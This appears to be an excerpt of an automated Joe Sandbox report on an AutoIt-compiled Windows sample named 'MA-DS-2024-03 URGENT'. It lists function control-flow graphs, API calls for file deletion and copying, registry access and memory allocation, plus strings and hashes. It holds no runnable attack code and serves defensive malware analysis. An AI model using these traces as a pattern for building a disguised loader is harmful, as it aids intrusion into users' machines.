                                                        control_flow_graph 1110 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1123 46920b-469212 call 469734 1110->1123 1124 4692b8-4692bf call 469734 1110->1124 1129 4692c1-4692c3 1123->1129 1130 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1123->1130 1124->1129 1131 4692c8 1124->1131 1132 46952a-46952b 1129->1132 1134 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1130->1134 1131->1134 1137 469548-469558 call 405211 1132->1137 1169 469390-4693ab call 468fa5 1134->1169 1170 469389-46938b 1134->1170 1173 4693b1-4693b9 1169->1173 1174 46943d-469449 call 4253a6 1169->1174 1170->1132 1176 4693c1 1173->1176 1177 4693bb-4693bf 1173->1177 1181 46945f-469463 1174->1181 1182 46944b-46945a DeleteFileW 1174->1182 1178 4693c6-4693e4 call 404f0b 1176->1178 1177->1178 1186 4693e6-4693eb 1178->1186 1187 46940e-469424 call 468953 call 424863 1178->1187 1184 469505-469519 CopyFileW 1181->1184 1185 469469-4694f2 call 4240bb call 4699ea call 468b06 1181->1185 1182->1132 1189 46952d-469543 DeleteFileW call 4698a2 1184->1189 1190 46951b-469528 DeleteFileW 1184->1190 1185->1189 1206 4694f4-469503 DeleteFileW 1185->1206 1192 4693ee-469401 call 4690dd 1186->1192 1203 469429-469434 1187->1203 1189->1137 1190->1132 1201 469403-46940c 1192->1201 1201->1187 1203->1173 1205 46943a 1203->1205 1205->1174 1206->1132
                                                        APIs
                                                          • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                                          • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                        • __wsplitpath.LIBCMT ref: 00469234
                                                          • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                                        • _wcscpy.LIBCMT ref: 00469247
                                                        • _wcscat.LIBCMT ref: 0046925A
                                                        • __wsplitpath.LIBCMT ref: 0046927F
                                                        • _wcscat.LIBCMT ref: 00469295
                                                        • _wcscat.LIBCMT ref: 004692A8
                                                          • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                                          • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                                        • _wcscmp.LIBCMT ref: 004691EF
                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                                        • _wcsncpy.LIBCMT ref: 004694C5
                                                        • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                                                        • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                                        • Opcode Fuzzy Hash: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                                                        • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69
                                                        Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                        • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                        • LoadIconW.USER32(000000A9), ref: 004030F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                        • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                                        • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                                        • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69
                                                        Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                        • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                        • LoadIconW.USER32(000000A9), ref: 004030F2
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                        • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                                        • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                                        • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9
                                                        Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1276 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1293 43e8b1-43e8cc RegQueryValueExW 1276->1293 1294 4071b6-4071d3 call 405904 * 2 1276->1294 1296 43e943-43e94f RegCloseKey 1293->1296 1297 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1293->1297 1296->1294 1299 43e955-43e959 1296->1299 1310 43e92b-43e931 1297->1310 1311 43e90f-43e929 call 407bcc 1297->1311 1302 43e95e-43e984 call 4079f2 * 2 1299->1302 1316 43e986-43e994 call 4079f2 1302->1316 1317 43e9a9-43e9b6 call 422bfc 1302->1317 1314 43e933-43e940 call 420e2c * 2 1310->1314 1315 43e941 1310->1315 1311->1310 1314->1315 1315->1296 1316->1317 1326 43e996-43e9a7 call 422d8d 1316->1326 1328 43e9b8-43e9c9 call 422bfc 1317->1328 1329 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1317->1329 1337 43ea1c-43ea1d 1326->1337 1328->1329 1338 43e9cb-43e9db call 422d8d 1328->1338 1329->1294 1329->1337 1337->1302 1338->1329
                                                        APIs
                                                          • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                                          • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                        • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                        • _wcscat.LIBCMT ref: 0043E9A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                        • API String ID: 2673923337-2727554177
                                                        • Opcode ID: 27bc7da5b5cd50995d28b92ffe80513406b54d2bc234f3195dcea08f44c465d6
                                                        • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                        • Opcode Fuzzy Hash: 27bc7da5b5cd50995d28b92ffe80513406b54d2bc234f3195dcea08f44c465d6
                                                        • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
                                                        Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1346 403633-403681 1348 4036e1-4036e3 1346->1348 1349 403683-403686 1346->1349 1348->1349 1352 4036e5 1348->1352 1350 4036e7 1349->1350 1351 403688-40368f 1349->1351 1356 4036ed-4036f0 1350->1356 1357 43d0cc-43d0fa call 411070 call 411093 1350->1357 1353 403695-40369a 1351->1353 1354 40374b-403753 PostQuitMessage 1351->1354 1355 4036ca-4036d2 DefWindowProcW 1352->1355 1361 4036a0-4036a2 1353->1361 1362 43d154-43d168 call 462527 1353->1362 1363 403711-403713 1354->1363 1364 4036d8-4036de 1355->1364 1358 4036f2-4036f3 1356->1358 1359 403715-40373c SetTimer RegisterWindowMessageW 1356->1359 1392 43d0ff-43d106 1357->1392 1365 4036f9-40370c KillTimer call 40443a call 403114 1358->1365 1366 43d06f-43d072 1358->1366 1359->1363 1368 40373e-403749 CreatePopupMenu 1359->1368 1369 403755-403764 call 4044a0 1361->1369 1370 4036a8-4036ad 1361->1370 1362->1363 1385 43d16e 1362->1385 1363->1364 1365->1363 1378 43d074-43d076 1366->1378 1379 43d0a8-43d0c7 MoveWindow 1366->1379 1368->1363 1369->1363 1374 4036b3-4036b8 1370->1374 1375 43d139-43d140 1370->1375 1383 43d124-43d134 call 462d36 1374->1383 1384 4036be-4036c4 1374->1384 1375->1355 1381 43d146-43d14f call 457c36 1375->1381 1387 43d097-43d0a3 SetFocus 1378->1387 1388 43d078-43d07b 1378->1388 1379->1363 1381->1355 1383->1363 1384->1355 1384->1392 1385->1355 1387->1363 1388->1384 1393 43d081-43d092 call 411070 1388->1393 1392->1355 1397 43d10c-43d11f call 40443a call 40434a 1392->1397 1393->1363 1397->1355
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                        • KillTimer.USER32(?,00000001), ref: 004036FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                        • CreatePopupMenu.USER32 ref: 0040373E
                                                        • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated$%I
                                                        • API String ID: 129472671-1195164674
                                                        • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                        • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                        • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                        • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E
                                                        Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                        • LoadIconW.USER32(00000063), ref: 00403A76
                                                        • LoadIconW.USER32(000000A4), ref: 00403A88
                                                        • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                        • RegisterClassExW.USER32(?), ref: 00403B16
                                                          • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                          • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                          • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                          • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                          • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                          • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                          • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                        • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                        • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                        • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                        Function 0167CE90 Relevance: 16.2, APIs: 10, Instructions: 1190COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9358735c024d8eee74632e46bbc21edd5feaa21ee39b106b4db2eedbc690e5f
                                                        • Instruction ID: c74a3ddb5d69d01d8fc7c03bafa40060b60c693c452f163e65241e5aceeb7dfd
                                                        • Opcode Fuzzy Hash: c9358735c024d8eee74632e46bbc21edd5feaa21ee39b106b4db2eedbc690e5f
                                                        • Instruction Fuzzy Hash: BCA279719093818BD736CB9CCC447AABBE1AFC5318F098E5DE59897392D335A804CB97
                                                        Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                        • API String ID: 1825951767-3937808951
                                                        • Opcode ID: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                                                        • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                        • Opcode Fuzzy Hash: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                                                        • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
                                                        Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                          • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                          • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                        • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                        • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID: <WL$\TL$%I$SL
                                                        • API String ID: 1986988660-4199584472
                                                        • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                        • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                        • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                        • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D
                                                        Function 00B655C8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2012 b655c8-b65676 call b62fc8 2015 b6567d-b656a3 call b664d8 CreateFileW 2012->2015 2018 b656a5 2015->2018 2019 b656aa-b656ba 2015->2019 2020 b657f5-b657f9 2018->2020 2026 b656c1-b656db VirtualAlloc 2019->2026 2027 b656bc 2019->2027 2021 b6583b-b6583e 2020->2021 2022 b657fb-b657ff 2020->2022 2028 b65841-b65848 2021->2028 2024 b65801-b65804 2022->2024 2025 b6580b-b6580f 2022->2025 2024->2025 2031 b65811-b6581b 2025->2031 2032 b6581f-b65823 2025->2032 2033 b656e2-b656f9 ReadFile 2026->2033 2034 b656dd 2026->2034 2027->2020 2029 b6589d-b658b2 2028->2029 2030 b6584a-b65855 2028->2030 2037 b658b4-b658bf VirtualFree 2029->2037 2038 b658c2-b658ca 2029->2038 2035 b65857 2030->2035 2036 b65859-b65865 2030->2036 2031->2032 2039 b65825-b6582f 2032->2039 2040 b65833 2032->2040 2041 b65700-b65740 VirtualAlloc 2033->2041 2042 b656fb 2033->2042 2034->2020 2035->2029 2045 b65867-b65877 2036->2045 2046 b65879-b65885 2036->2046 2037->2038 2039->2040 2040->2021 2043 b65747-b65762 call b66728 2041->2043 2044 b65742 2041->2044 2042->2020 2052 b6576d-b65777 2043->2052 2044->2020 2048 b6589b 2045->2048 2049 b65887-b65890 2046->2049 2050 b65892-b65898 2046->2050 2048->2028 2049->2048 2050->2048 2053 b657aa-b657be call b66538 2052->2053 2054 b65779-b657a8 call b66728 2052->2054 2060 b657c2-b657c6 2053->2060 2061 b657c0 2053->2061 2054->2052 2062 b657d2-b657d6 2060->2062 2063 b657c8-b657cc CloseHandle 2060->2063 2061->2020 2064 b657e6-b657ef 2062->2064 2065 b657d8-b657e3 VirtualFree 2062->2065 2063->2062 2064->2015 2064->2020 2065->2064
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00B65699
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B658BF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction ID: fbe5b0503ae7f27bfbd74396c4c08c9e80f3bb71995ea8f4f91b951120626797
                                                        • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
